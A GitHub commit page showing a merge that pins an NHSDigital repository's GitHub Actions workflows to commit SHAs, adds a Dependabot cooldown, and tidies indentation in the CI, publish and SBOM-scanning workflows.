Skip to content

Commit ae6dae5

Browse files
NautiyalVikas1NautiyalVikas1
authored
Merge pull request #575 from NHSDigital/APM-7202
APM-7202
2 parents f0ab7fe + c1c6912 commit ae6dae5

File tree

5 files changed

+74
-75
lines changed

5 files changed

+74
-75
lines changed

.github/dependabot.yml

Lines changed: 3 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -51,4 +51,6 @@ updates:
5151
schedule:
5252
interval: "daily"
5353
target-branch: "master"
54-
labels: ["dependencies", "github-actions"]
54+
labels: ["dependencies", "github-actions"]
55+
cooldown:
56+
default-days: 7

.github/workflows/continuous-integration.yml

Lines changed: 16 additions & 16 deletions
Original file line numberDiff line numberDiff line change
@@ -6,20 +6,20 @@ jobs:
66
test_deployments:
77
runs-on: ubuntu-latest
88
steps:
9-
- name: Checkout Scripts
10-
uses: actions/checkout@v2
9+
- name: Checkout Scripts
10+
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
1111

12-
- name: Test Pull Request Deployments
13-
env:
14-
AZURE_TOKEN: "${{ secrets.AZURE_TOKEN }}"
15-
AZ_CLIENT_ID: "${{ secrets.AZ_CLIENT_ID }}"
16-
AZ_CLIENT_SECRET: "${{ secrets.AZ_CLIENT_SECRET }}"
17-
AZ_CLIENT_TENANT: "${{ secrets.AZ_CLIENT_TENANT }}"
18-
run: |
19-
export BRANCH_NAME="${{ github.event.pull_request.head.ref }}"
20-
export NOTIFY_COMMIT_SHA="${{ github.event.pull_request.head.sha }}"
21-
export UTILS_PR_NUMBER="${{ github.event.pull_request.number }}"
22-
echo UTILS_PR_NUMBER=${UTILS_PR_NUMBER}
23-
echo BRANCH_NAME=${BRANCH_NAME}
24-
echo NOTIFY_COMMIT_SHA=${NOTIFY_COMMIT_SHA}
25-
python3 scripts/test_pull_request_deployments.py
12+
- name: Test Pull Request Deployments
13+
env:
14+
AZURE_TOKEN: "${{ secrets.AZURE_TOKEN }}"
15+
AZ_CLIENT_ID: "${{ secrets.AZ_CLIENT_ID }}"
16+
AZ_CLIENT_SECRET: "${{ secrets.AZ_CLIENT_SECRET }}"
17+
AZ_CLIENT_TENANT: "${{ secrets.AZ_CLIENT_TENANT }}"
18+
run: |
19+
export BRANCH_NAME="${{ github.event.pull_request.head.ref }}"
20+
export NOTIFY_COMMIT_SHA="${{ github.event.pull_request.head.sha }}"
21+
export UTILS_PR_NUMBER="${{ github.event.pull_request.number }}"
22+
echo UTILS_PR_NUMBER=${UTILS_PR_NUMBER}
23+
echo BRANCH_NAME=${BRANCH_NAME}
24+
echo NOTIFY_COMMIT_SHA=${NOTIFY_COMMIT_SHA}
25+
python3 scripts/test_pull_request_deployments.py

.github/workflows/dependabot-auto-merge.yml

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -19,7 +19,7 @@ jobs:
1919
steps:
2020
- name: Fetch Dependabot metadata
2121
id: meta
22-
uses: dependabot/fetch-metadata@v2
22+
uses: dependabot/fetch-metadata@21025c705c08248db411dc16f3619e6b5f9ea21a # v2.5.0
2323
with:
2424
github-token: ${{ secrets.GITHUB_TOKEN }}
2525

@@ -34,4 +34,4 @@ jobs:
3434
run: gh pr merge --auto --squash "$PR_URL"
3535
env:
3636
PR_URL: ${{ github.event.pull_request.html_url }}
37-
GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
37+
GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}

.github/workflows/publish.yml

Lines changed: 46 additions & 46 deletions
Original file line numberDiff line numberDiff line change
@@ -3,49 +3,49 @@ name: Publish / Calculate Version
33
on: push
44

55
jobs:
6-
build:
7-
name: calculate version
8-
runs-on: ubuntu-22.04
9-
steps:
10-
- name: Checkout
11-
uses: actions/checkout@v2
12-
with:
13-
fetch-depth: 0 # This causes all history to be fetched, which is required for calculate-version to function
14-
15-
- name: Install Python 3.13
16-
uses: actions/setup-python@v5
17-
with:
18-
python-version: 3.13
19-
20-
- name: Install poetry
21-
run: pip install poetry
22-
23-
- name: Cache poetry packages
24-
uses: actions/cache@v4
25-
id: cache
26-
with:
27-
path: ~/.venv
28-
key: ${{ runner.os }}-utils-venv-${{ hashFiles('**/poetry.lock') }}
29-
30-
- name: Install
31-
run: poetry install
32-
if: steps.cache.outputs.cache-hit != 'true'
33-
34-
- name: Set SPEC_VERSION env var
35-
run: |
36-
version="$(poetry run python scripts/calculate_version.py)"
37-
echo "${version}"
38-
echo ::set-env name=SPEC_VERSION::${version}
39-
env:
40-
ACTIONS_ALLOW_UNSECURE_COMMANDS: true
41-
42-
- name: Create release (master only)
43-
id: create-release
44-
if: github.ref == 'refs/heads/master'
45-
uses: actions/create-release@v1
46-
continue-on-error: true
47-
env:
48-
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
49-
with:
50-
tag_name: ${{ env.SPEC_VERSION }}
51-
release_name: ${{ env.SPEC_VERSION }}
6+
build:
7+
name: calculate version
8+
runs-on: ubuntu-22.04
9+
steps:
10+
- name: Checkout
11+
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
12+
with:
13+
fetch-depth: 0 # This causes all history to be fetched, which is required for calculate-version to function
14+
15+
- name: Install Python 3.13
16+
uses: actions/setup-python@e797f83bcb11b83ae66e0230d6156d7c80228e7c # v6.0.0
17+
with:
18+
python-version: 3.13
19+
20+
- name: Install poetry
21+
run: pip install poetry
22+
23+
- name: Cache poetry packages
24+
uses: actions/cache@cdf6c1fa76f9f475f3d7449005a359c84ca0f306 # v5.0.3
25+
id: cache
26+
with:
27+
path: ~/.venv
28+
key: ${{ runner.os }}-utils-venv-${{ hashFiles('**/poetry.lock') }}
29+
30+
- name: Install
31+
run: poetry install
32+
if: steps.cache.outputs.cache-hit != 'true'
33+
34+
- name: Set SPEC_VERSION env var
35+
run: |
36+
version="$(poetry run python scripts/calculate_version.py)"
37+
echo "${version}"
38+
echo ::set-env name=SPEC_VERSION::${version}
39+
env:
40+
ACTIONS_ALLOW_UNSECURE_COMMANDS: true
41+
42+
- name: Create release (master only)
43+
id: create-release
44+
if: github.ref == 'refs/heads/master'
45+
uses: actions/create-release@0cb9c9b65d5d1901c1f53e5e66eaf4afd303e70e # v1.1.4
46+
continue-on-error: true
47+
env:
48+
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
49+
with:
50+
tag_name: ${{ env.SPEC_VERSION }}
51+
release_name: ${{ env.SPEC_VERSION }}

.github/workflows/sbom.yml

Lines changed: 7 additions & 10 deletions
Original file line numberDiff line numberDiff line change
@@ -24,10 +24,10 @@ jobs:
2424
contents: write
2525
steps:
2626
- name: Checkout
27-
uses: actions/checkout@v5
27+
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
2828

2929
- name: Setup Python 3.13
30-
uses: actions/setup-python@v5
30+
uses: actions/setup-python@e797f83bcb11b83ae66e0230d6156d7c80228e7c # v6.0.0
3131
with:
3232
python-version: "3.13"
3333

@@ -56,7 +56,7 @@ jobs:
5656
chmod +x syft
5757
5858
# Add to PATH for subsequent steps
59-
echo "$(pwd)" >> $GITHUB_PATH
59+
echo "$(pwd)" >> $GITHUB_PATH
6060
6161
- name: Create SBOM
6262
run: bash scripts/create-sbom.sh terraform python tflint
@@ -69,7 +69,7 @@ jobs:
6969
python .github/scripts/sbom_json_to_csv.py sbom.json SBOM_${REPO_NAME}.csv
7070
7171
- name: Upload SBOM CSV as artifact
72-
uses: actions/upload-artifact@v4
72+
uses: actions/upload-artifact@bbbca2ddaa5d8feaa63e36b76fdaad77386f024f # v7.0.0
7373
with:
7474
name: sbom-csv
7575
path: SBOM_${{ github.event.repository.name }}.csv
@@ -81,18 +81,15 @@ jobs:
8181
- name: Scan SBOM for Vulnerabilities (JSON)
8282
run: |
8383
grype sbom:sbom.json -o json > grype-report.json
84-
85-
8684
8785
- name: Convert Grype JSON to CSV
8886
run: |
8987
pip install --upgrade pip
9088
REPO_NAME=$(basename $GITHUB_REPOSITORY)
9189
python .github/scripts/grype_json_to_csv.py grype-report.json grype-report-${REPO_NAME}.csv
9290
93-
9491
- name: Upload Vulnerability Report
95-
uses: actions/upload-artifact@v4
92+
uses: actions/upload-artifact@bbbca2ddaa5d8feaa63e36b76fdaad77386f024f # v7.0.0
9693
with:
9794
name: grype-report
9895
path: grype-report-${{ github.event.repository.name }}.csv
@@ -104,7 +101,7 @@ jobs:
104101
python .github/scripts/sbom_packages_to_csv.py sbom.json $REPO_NAME
105102
106103
- name: Upload Package Inventory CSV
107-
uses: actions/upload-artifact@v4
104+
uses: actions/upload-artifact@bbbca2ddaa5d8feaa63e36b76fdaad77386f024f # v7.0.0
108105
with:
109106
name: sbom-packages
110-
path: sbom-packages-${{ github.event.repository.name }}.csv
107+
path: sbom-packages-${{ github.event.repository.name }}.csv

0 commit comments

Comments
 (0)